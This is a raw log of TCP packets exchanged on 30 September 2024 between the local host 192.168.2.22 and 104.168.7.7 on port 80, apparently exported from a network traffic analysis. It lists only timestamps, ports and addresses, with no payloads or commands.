                                                              Sep 30, 2024 10:26:31.396508932 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396512032 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396522045 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396534920 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396548033 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396548033 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396560907 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396563053 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396581888 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396589994 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396599054 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396601915 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396614075 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396632910 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396639109 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396656036 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396656990 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396675110 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396686077 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396687031 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396698952 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396713018 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396723032 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396738052 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396754980 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396775961 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396789074 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396800995 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396812916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396814108 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396826982 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396830082 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396846056 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396859884 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396861076 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396879911 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396893978 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396903038 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396905899 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396914959 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396918058 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396930933 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.396936893 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396956921 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.396962881 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397001028 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397012949 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397027016 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397037983 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397051096 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397063971 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397085905 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397099018 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397110939 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397125006 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397129059 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397140026 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397142887 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397154093 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397161961 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397166967 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397176981 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397196054 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397207022 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397233963 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397247076 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397258997 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397270918 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397273064 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397283077 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397285938 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397306919 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397317886 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397340059 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397352934 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397363901 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397376060 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397378922 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397391081 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397396088 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397404909 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.397413969 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397434950 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397442102 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.397468090 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482060909 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482080936 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482101917 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482115984 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482120991 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482129097 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482142925 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482146978 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482156992 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482158899 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482173920 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482182980 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482184887 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482193947 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482213974 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482224941 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482584953 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482598066 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482610941 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482635021 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482650042 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482660055 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482662916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482675076 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482676983 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482687950 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482697964 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482714891 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482716084 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482726097 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482728958 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482738018 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482750893 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482750893 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482764006 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482785940 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482785940 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482799053 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482810974 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482822895 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482825041 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482845068 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482853889 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482861996 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482865095 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482892036 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482903004 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482916117 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482933044 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482943058 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482945919 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.482955933 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482969999 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.482991934 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483011007 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483028889 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483042955 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483056068 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483066082 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483066082 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483069897 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483076096 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483082056 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483093977 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483094931 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483108997 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483124971 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483129978 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483138084 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483150005 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483160973 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483170033 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483181953 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483191013 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483195066 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.483203888 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483222961 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483239889 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.483268023 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484347105 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484380960 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484394073 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484396935 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484406948 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484416008 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484433889 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484445095 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484471083 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484484911 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484498024 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484508991 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484524965 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484555006 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484601974 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484615088 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484628916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484638929 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484639883 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484658003 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484658957 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484672070 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484674931 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484683037 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484702110 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484716892 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.484855890 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.484904051 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485001087 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485011101 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485022068 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485033989 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485053062 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485053062 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485068083 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485068083 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485080957 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485093117 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485093117 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485105991 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485105991 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485125065 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485127926 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485140085 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485146046 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485152960 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485163927 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485167027 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485182047 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485191107 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485199928 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485236883 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485282898 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485924959 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485949993 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485964060 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.485971928 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485985041 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.485999107 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486002922 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486011028 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486023903 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486036062 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486043930 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486061096 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486072063 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486104965 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486118078 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486131907 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486143112 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486144066 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486156940 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486160994 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486170053 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486177921 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486183882 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486195087 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486216068 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486234903 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486756086 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486771107 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486783028 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486795902 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486803055 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486808062 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486821890 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486821890 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486843109 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486852884 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486871958 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486885071 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486896038 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486907959 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486910105 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486920118 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.486934900 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486943007 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.486963034 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.487003088 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.487014055 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.487025976 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.487036943 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.487051964 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.487066984 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488145113 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488195896 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488197088 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488236904 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488325119 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488337994 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488349915 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488364935 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488373041 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488389969 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488395929 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488408089 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488409996 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488440037 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488451004 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488552094 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488564014 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488576889 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488590956 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488596916 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488605976 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488617897 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488619089 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488625050 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488637924 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488646984 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488651037 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488665104 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488676071 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488677025 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488688946 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488694906 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488702059 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488707066 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488714933 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488725901 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488729954 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.488745928 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.488759041 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568242073 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568280935 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568301916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568303108 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568316936 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568334103 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568337917 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568348885 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568361998 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568375111 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568377018 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568387032 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568418980 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568761110 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568787098 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568806887 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568808079 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568823099 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568828106 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568835974 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568840981 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568854094 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568855047 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568869114 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568876028 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568881989 CEST8049169104.168.7.7192.168.2.22
